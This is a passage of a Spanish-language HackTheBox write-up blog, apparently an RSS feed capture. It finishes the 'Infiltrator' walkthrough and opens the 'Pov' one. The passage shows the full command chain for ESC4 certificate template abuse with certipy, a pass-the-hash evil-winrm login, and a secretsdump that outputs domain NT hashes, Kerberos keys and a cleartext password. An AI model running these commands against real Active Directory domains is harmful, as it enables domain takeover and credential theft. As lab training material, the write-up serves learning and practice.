class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata<span class="se">\t</span>emp&gt; Get-ADUser -Identity administrator -Properties SID <span class="p">|</span> Select-Object SID </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SID </span></span><span class="line"><span class="cl">--- </span></span><span class="line"><span class="cl">S-1-5-21-2606098828-3734741516-3625406802-500 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata<span class="se">\t</span>emp&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Solicitamos un certificado especificando el upn de administrator con el SID.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ certipy req -u infiltrator_svc$ -hashes 663675deae5af90402f1d53c8117cdaa -dc-ip 10.10.11.31 -ns 10.10.11.31 -ca infiltrator-DC01-CA -target dc01.infiltrator.htb -template Infiltrator_Template -upn administrator@infiltrator.htb -sid S-1-5-21-2606098828-3734741516-3625406802-500 </span></span><span class="line"><span class="cl">Certipy v5.0.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting certificate via RPC </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Request ID is <span class="m">9</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully requested certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got certificate with UPN <span class="s1">&#39;administrator@infiltrator.htb&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Certificate object SID is <span class="s1">&#39;S-1-5-21-2606098828-3734741516-3625406802-500&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving certificate and private key to <span class="s1">&#39;administrator.pfx&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Wrote certificate and private key to <span class="s1">&#39;administrator.pfx&#39;</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Realizamos la autenticacion con el certificado anterior logrando obtener el hash de Administrator.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ certipy auth -pfx <span class="s1">&#39;administrator.pfx&#39;</span> -dc-ip 10.10.11.31 </span></span><span class="line"><span class="cl">Certipy v5.0.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Certificate identities: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> SAN UPN: <span class="s1">&#39;administrator@infiltrator.htb&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> SAN URL SID: <span class="s1">&#39;S-1-5-21-2606098828-3734741516-3625406802-500&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Security Extension SID: <span class="s1">&#39;S-1-5-21-2606098828-3734741516-3625406802-500&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: <span class="s1">&#39;administrator@infiltrator.htb&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got TGT </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving credential cache to <span class="s1">&#39;administrator.ccache&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Wrote credential cache to <span class="s1">&#39;administrator.ccache&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to retrieve NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator@infiltrator.htb&#39;</span>: aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1 </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Commands</span> </span></span><span class="line"><span class="cl"><span class="c1"># ESC4 for Infiltrator -&gt; Infiltrator_Template</span> </span></span><span class="line"><span class="cl">certipy template -u infiltrator_svc$ -hashes 663675deae5af90402f1d53c8117cdaa -dc-ip 10.10.11.31 -ns 10.10.11.31 -template Infiltrator_Template -write-default-configuration </span></span><span class="line"><span class="cl">certipy req -u infiltrator_svc$ -hashes 663675deae5af90402f1d53c8117cdaa -dc-ip 10.10.11.31 -ns 10.10.11.31 -ca infiltrator-DC01-CA -target dc01.infiltrator.htb -template Infiltrator_Template -upn administrator@infiltrator.htb -sid S-1-5-21-2606098828-3734741516-3625406802-500 </span></span><span class="line"><span class="cl">certipy auth -pfx administrator.pfx -dc-ip 10.10.11.31 </span></span></code></pre></td></tr></table> </div> </div><h2 id="shell">Shell</h2> <p>Con evil-winrm y el hash de administrador logramos obtener una shell y la flag <code>root.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ evil-winrm -i dc01.infiltrator.htb -u administrator -H 1356f502d2764368302ff0369b1121a1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: undefined method <span class="sb">`</span>quoting_detection_proc<span class="err">&#39;</span> <span class="k">for</span> module Reline </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; whoami </span></span><span class="line"><span class="cl">infiltrator<span class="se">\a</span>dministrator </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; cat ../Desktop/root.txt </span></span><span class="line"><span class="cl">6182542a9ab0e9a14c2095f21000523e </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="dump-hashes">Dump Hashes</h2> <p>Realizamos un dump de las hashes con <code>secretdump</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ secretsdump.py administrator@infiltrator.htb -hashes :1356f502d2764368302ff0369b1121a1 </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Target system bootKey: 0xb69149edc42a85733e4efe5e35a33e87 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping <span class="nb">local</span> SAM hashes <span class="o">(</span>uid:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:4dc8e10f3a29237b05bdfdb5bded5451::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> SAM hashes extraction <span class="k">for</span> user WDAGUtilityAccount failed. The account doesn<span class="err">&#39;</span>t have <span class="nb">hash</span> information. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping cached domain logon information <span class="o">(</span>domain/username:hash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping LSA Secrets </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> <span class="nv">$MACHINE</span>.ACC </span></span><span class="line"><span class="cl">INFILTRATOR<span class="se">\D</span>C01$:aes256-cts-hmac-sha1-96:15db1652b02a83f4324bd8ba4f2a20eb8ea7631bf87dfec2d4f97ebeff32435d </span></span><span class="line"><span class="cl">INFILTRATOR<span class="se">\D</span>C01$:aes128-cts-hmac-sha1-96:70d8ad0059f5e81f43310c34e9937556 </span></span><span class="line"><span class="cl">INFILTRATOR<span class="se">\D</span>C01$:des-cbc-md5:80fe9dbfa22531ab </span></span><span class="line"><span class="cl">INFILTRATOR<span class="se">\D</span>C01$:plain_password_hex:0a3183391dac772712b98e94fead3b9456bfedcc57c953d18084f50e94cf42d6c08434a1d3217c2fe151916a0ae7867c415ab8d3546f4ecc4707410ca56e2556aef2298066f7842ec1ad4819706032c10db5d22ff762c9a4fdeb82405627c04ed0ae8ee0514170acb1f0fa8964a2d045ba16b749ef89933bccd53b25a8aa0f5d17c2d519f9aa7a939b1fb9701bb88a1abb5efdfbcd02226e09032d8ffced8801e6cf8adf16bceb1491482d23a8281326cc82a6fa06425336d1422cd3b1cadd389263a9f557ce5221a86b28a71dc6276a0ac8165b7c5c5929dd3998130bbd7b9e41b9a8e4d69e1b7a614f25b6a8aa672b </span></span><span class="line"><span class="cl">INFILTRATOR<span class="se">\D</span>C01$:aad3b435b51404eeaad3b435b51404ee:c4d8ecef85fdd70a87fa9c8da56a417f::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DefaultPassword </span></span><span class="line"><span class="cl">INFILTRATOR<span class="se">\A</span>dministrator:Infiltrator_Box1337! </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DPAPI_SYSTEM </span></span><span class="line"><span class="cl">dpapi_machinekey:0xbd8a15f7e24918ac40db6b340498aeda032c4fc0 </span></span><span class="line"><span class="cl">dpapi_userkey:0xf0f81997f3c057103ab87ac71dc986c455880e83 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> NL<span class="nv">$KM</span> </span></span><span class="line"><span class="cl"> <span class="m">0000</span> A9 F8 C1 <span class="m">38</span> F1 FB <span class="m">53</span> 1A E1 <span class="m">12</span> CA 8A <span class="m">61</span> D3 C1 D6 ...8..S.....a... </span></span><span class="line"><span class="cl"> <span class="m">0010</span> <span class="m">67</span> <span class="m">09</span> <span class="m">77</span> BC BC C6 BC 2F 5D E3 <span class="m">18</span> 3D <span class="m">66</span> DB 6D 9F g.w..../<span class="o">]</span>..<span class="o">=</span>f.m. </span></span><span class="line"><span class="cl"> <span class="m">0020</span> <span class="m">03</span> <span class="m">30</span> <span class="m">80</span> 2D <span class="m">25</span> 9F <span class="m">69</span> <span class="m">56</span> <span class="m">39</span> <span class="m">55</span> EA A3 <span class="m">50</span> D0 CA 0F .0.-%.iV9U..P... </span></span><span class="line"><span class="cl"> <span class="m">0030</span> C6 <span class="m">18</span> <span class="m">45</span> <span class="m">14</span> 9E 8E B6 3C <span class="m">46</span> <span class="m">49</span> 6F 3B FA EF FE <span class="m">89</span> ..E....&lt;FIo<span class="p">;</span>.... </span></span><span class="line"><span class="cl">NL<span class="nv">$KM</span>:a9f8c138f1fb531ae112ca8a61d3c1d6670977bcbcc6bc2f5de3183d66db6d9f0330802d259f69563955eaa350d0ca0fc61845149e8eb63c46496f3bfaeffe89 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping Domain Credentials <span class="o">(</span>domain<span class="se">\u</span>id:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using the DRSUAPI method to get NTDS.DIT secrets </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d400d2ccb162e93b66e8025118a55104::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\D</span>.anderson:1103:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\L</span>.clark:1104:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\M</span>.harris:1105:aad3b435b51404eeaad3b435b51404ee:3ed8cf1bd9504320b50b2191e8fb7069::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\O</span>.martinez:1106:aad3b435b51404eeaad3b435b51404ee:daf40bbfbf00619b01402e5f3acd40a9::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\A</span>.walker:1107:aad3b435b51404eeaad3b435b51404ee:f349468bb2c669ec8c3fd4154fdfe126::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\K</span>.turner:1108:aad3b435b51404eeaad3b435b51404ee:a119c0d5af383e9591ebb67857e2b658::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\E</span>.rodriguez:1109:aad3b435b51404eeaad3b435b51404ee:b02e97f2fdb5c3d36f77375383449e56::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\w</span>inrm_svc:1601:aad3b435b51404eeaad3b435b51404ee:120c6c7a0acb0cd808e4b601a4f41fd4::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\l</span>an_managment:8101:aad3b435b51404eeaad3b435b51404ee:a1983d156e1d0fdf9b01208e2b46670d::: </span></span><span class="line"><span class="cl">DC01$:1000:aad3b435b51404eeaad3b435b51404ee:c4d8ecef85fdd70a87fa9c8da56a417f::: </span></span><span class="line"><span class="cl">infiltrator_svc$:3102:aad3b435b51404eeaad3b435b51404ee:4bc37a35b66f6ea51e478ca5473d4e59::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Kerberos keys grabbed </span></span><span class="line"><span class="cl">Administrator:aes256-cts-hmac-sha1-96:9d9ae321762ce3d90ff7835a9e9a8fe453bcc3b35c0cb212326e0efb2e8b29ba </span></span><span class="line"><span class="cl">Administrator:aes128-cts-hmac-sha1-96:762b10a1e2296a49bab7da1ce32755ed </span></span><span class="line"><span class="cl">Administrator:des-cbc-md5:0497041f3e5d2598 </span></span><span class="line"><span class="cl">krbtgt:aes256-cts-hmac-sha1-96:673c00e9dd5ca94e9be6312a159fc1c4e2ef95792ec45f867ec2c1ad439f3150 </span></span><span class="line"><span class="cl">krbtgt:aes128-cts-hmac-sha1-96:674de1e736dbefda6f24dd914e598d79 </span></span><span class="line"><span class="cl">krbtgt:des-cbc-md5:a4b9c73bc4a46bcd </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\D</span>.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\D</span>.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\D</span>.anderson:des-cbc-md5:1529a829132a2345 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\L</span>.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\L</span>.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\L</span>.clark:des-cbc-md5:cd023d5d70e6aefd </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\M</span>.harris:aes256-cts-hmac-sha1-96:90dd4ed523ecc25972afe0b133cad79d5c5b88e6bc5cd1a8d2920ccb45b15596 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\M</span>.harris:aes128-cts-hmac-sha1-96:bf1e51ae7fa659e146833d8de8ff3d17 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\M</span>.harris:des-cbc-md5:7fabf8e6e5678a67 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\O</span>.martinez:aes256-cts-hmac-sha1-96:d497f5a48df0dd55d34c79c7893867a3aad8b222dc7f41af67a1476735c9ed75 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\O</span>.martinez:aes128-cts-hmac-sha1-96:a062fd39eee45a7ceea3f8e5b7525d10 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\O</span>.martinez:des-cbc-md5:70f8164a9713ba8c </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\A</span>.walker:aes256-cts-hmac-sha1-96:cbaeaefb06f17d3eb1d49550e5714fbdf517922c841375cd6a6cd750aa5e3efe </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\A</span>.walker:aes128-cts-hmac-sha1-96:27b89dea58e7a98cfadc60b2af7ab568 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\A</span>.walker:des-cbc-md5:a4515dd5d09be9b9 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\K</span>.turner:aes256-cts-hmac-sha1-96:0f75078e57f71485606fef572b36a278645e2053438e8596c48be7e41e56055a </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\K</span>.turner:aes128-cts-hmac-sha1-96:fb14214da9c033aa04c0d559abbd3f7a </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\K</span>.turner:des-cbc-md5:b94a5d234307459b </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\E</span>.rodriguez:aes256-cts-hmac-sha1-96:52c2444473f775e05ba01744af63901249a018ade7369a262981ce3aeede220a </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\E</span>.rodriguez:aes128-cts-hmac-sha1-96:9988b989a3d40045326f8908094a79be </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\E</span>.rodriguez:des-cbc-md5:2f013eea29c7f237 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\w</span>inrm_svc:aes256-cts-hmac-sha1-96:61f308b54f3b17ed48c2877c775a6aa37789b46c1741e356f6fcdab75373d1ca </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\w</span>inrm_svc:aes128-cts-hmac-sha1-96:1d454266ab84bfe7ce7bb03e48a23ac7 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\w</span>inrm_svc:des-cbc-md5:01ce70109ecea73b </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\l</span>an_managment:aes256-cts-hmac-sha1-96:e66b410341a87c4f1ff382e9c4e3e26d0a351de2ebea9ba0d234b7713cfb0ce6 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\l</span>an_managment:aes128-cts-hmac-sha1-96:5bf2b52baf80470a2dfe5466c44e9896 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\l</span>an_managment:des-cbc-md5:b6044c94896e57f1 </span></span><span class="line"><span class="cl">DC01$:aes256-cts-hmac-sha1-96:15db1652b02a83f4324bd8ba4f2a20eb8ea7631bf87dfec2d4f97ebeff32435d </span></span><span class="line"><span class="cl">DC01$:aes128-cts-hmac-sha1-96:70d8ad0059f5e81f43310c34e9937556 </span></span><span class="line"><span class="cl">DC01$:des-cbc-md5:fb2954402cd32f5e </span></span><span class="line"><span class="cl">infiltrator_svc$:aes256-cts-hmac-sha1-96:56e0aa473964e0dbc481fc783373842de1cb383fc8171164e9e6849338c277a9 </span></span><span class="line"><span class="cl">infiltrator_svc$:aes128-cts-hmac-sha1-96:b23d807863adc3b3dcb5a594535c879c </span></span><span class="line"><span class="cl">infiltrator_svc$:des-cbc-md5:ef52681ca2a72fc1 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Cleaning up... </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div>]]> sckull featured image meta image kerbrute ASREPRoast bloodhound-ce password-spraying GenericAll getTGT dacledit change-password-ad addself-ad forcechangepassword-ad net bloodyAD krb5.conf output-messenger chisel wireshark ILSpy c# AES-cipher output-messenger-events msfvenom metasploit 7z2john bitlocker xfreerdp3 rdp NTDS-db secretsdump ntdsdotsqlite netexec-gmsa certipy ESC4 hackthebox windows HackTheBox - Pov https://sckull.github.io/posts/pov/ Sat, 08 Jun 2024 00:00:00 +0000 Sat, 08 Jun 2024 00:00:00 +0000 https://sckull.github.io/posts/pov/ <div class="featured-image__wrapper"> <img src="https://sckull.github.io/images/posts/htb/pov/cover.png" alt="featured image" class="featured-image" style="width: ;height: ;"> </div> <p>En Pov logramos la lectura de la configuracion de la aplicacion web por medio de path traversal, lo que nos permitio explotar una vulnerabilidad de deserializacion con la tool ysoserial y acceso a un primer usuario. Accedimos a un segundo usuario con las credenciales dentro de un archivo xml. Finalmente escalamos privilegios tras migrar a un proceso privilegiado en WinRM y Metasploit.</p> <![CDATA[ <div class="featured-image__wrapper"> <img src="https://sckull.github.io/images/posts/htb/pov/cover.png" alt="featured image" class="featured-image" style="width: ;height: ;"> </div> <p>En Pov logramos la lectura de la configuracion de la aplicacion web por medio de path traversal, lo que nos permitio explotar una vulnerabilidad de deserializacion con la tool ysoserial y acceso a un primer usuario. Accedimos a un segundo usuario con las credenciales dentro de un archivo xml. Finalmente escalamos privilegios tras migrar a un proceso privilegiado en WinRM y Metasploit.</p> <table> <thead> <tr> <th>Nombre</th> <th style="text-align: center"><a href="https://www.hackthebox.eu/home/machines/profile/585">Pov</a> <img src="#ZgotmplZ" alt="box_img_maker"></th> </tr> </thead> <tbody> <tr> <td><strong>OS</strong></td> <td style="text-align: center"><span><p class="os_type"> Windows <img src="https://sckull.github.io/images/icons/win.png" class="img_type_os"/></p></span></td> </tr> <tr> <td><strong>Puntos</strong></td> <td style="text-align: center">30</td> </tr> <tr> <td><strong>Dificultad</strong></td> <td style="text-align: center">Media</td> </tr> <tr> <td><strong>IP</strong></td> <td style="text-align: center">10.10.11.251</td> </tr> <tr> <td><strong>Maker</strong></td> <td style="text-align: center"><span><p class="user_maker"> <a href="https://www.hackthebox.eu/home/users/profile/128944">d00msl4y3r</a><img src="https://www.hackthebox.eu/badge/image/128944" class="img_user_maker"/></p></span></td> </tr> <tr> <td> <a href="#" class="button" style="width: 72px; height: 30px; pointer-events: none;" data-color="default" target="_blank" rel="noreferrer"> <span class="button__text"> Matrix </span> </a></td> <td style="text-align: center"><div class="box"><pre tabindex="0"><code class="language-chart" data-lang="chart">{ &#34;type&#34;:&#34;radar&#34;, &#34;data&#34;:{ &#34;labels&#34;:[&#34;Enumeration&#34;,&#34;Real-Life&#34;,&#34;CVE&#34;,&#34;Custom Explotation&#34;,&#34;CTF-Like&#34;], &#34;datasets&#34;:[ { &#34;label&#34;:&#34;User Rate&#34;, &#34;data&#34;:[5.6, 5.6, 4.8, 5.2, 4.4], &#34;backgroundColor&#34;:&#34;rgba(75, 162, 189,0.5)&#34;, &#34;borderColor&#34;:&#34;#4ba2bd&#34; }, { &#34;label&#34;:&#34;Maker Rate&#34;, &#34;data&#34;:[0, 0, 0, 0, 0], &#34;backgroundColor&#34;:&#34;rgba(154, 204, 20,0.5)&#34;, &#34;borderColor&#34;:&#34;#9acc14&#34; } ] }, &#34;options&#34;: {&#34;scale&#34;: {&#34;ticks&#34;: {&#34;backdropColor&#34;:&#34;rgba(0,0,0,0)&#34;}, &#34;angleLines&#34;:{&#34;color&#34;:&#34;rgba(255, 255, 255,0.6)&#34;}, &#34;gridLines&#34;:{&#34;color&#34;:&#34;rgba(255, 255, 255,0.6)&#34;} } } } </code></pre></div></td> </tr> </tbody> </table> <h1 id="recon">Recon</h1> <h2 id="nmap">nmap</h2> <p><code>nmap</code> muestra multiples puertos abiertos: http (80) y ssh (22).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Nmap 7.94SVN scan initiated Tue Mar 12 15:46:52 2024 as: nmap -p80 -sV -sC -oN nmap_scan 10.10.11.251</span> </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.11.251 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.065s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">80/tcp open http Microsoft IIS httpd 10.0 </span></span><span 